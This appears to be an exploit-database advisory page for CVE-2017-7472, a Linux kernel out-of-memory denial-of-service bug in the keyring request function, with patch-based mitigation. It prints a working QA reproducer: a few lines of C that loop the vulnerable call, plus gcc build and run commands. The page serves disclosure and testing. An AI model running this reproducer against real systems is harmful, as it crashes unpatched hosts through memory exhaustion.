header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Novell Bugzilla
7,8
CVSS
HIGH
Out-of-Memory Vulnerability
400
CWE
Product Name: Linux Kernel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2017

CVE-2017-7472

CVE-2017-7472 is an out-of-memory vulnerability in the Linux kernel. It is caused by a bug in the keyctl_set_reqkey_keyring() function, which can be triggered by running a specially crafted C program. This program will cause the kernel to run out of memory, leading to a denial of service.

Mitigation:

The vulnerability can be mitigated by applying the patch provided by the vendor.
Source

Exploit-DB raw data:

/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}

Navigation

Suggest Exploit

Services By CQR